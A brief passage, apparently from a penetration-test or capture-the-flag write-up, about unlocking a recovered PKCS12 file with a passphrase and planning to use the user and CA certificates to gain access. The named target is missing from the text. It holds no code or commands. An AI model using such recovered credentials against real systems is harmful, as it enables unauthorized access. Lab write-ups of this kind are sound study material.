Once we have this passphrase and inspect the certificate, we see this is a user certificate and with the CA certificate file (of course, it is a PKCS12 certificate file). Now, with these certificates, we can try and access which is what this certificate is for:
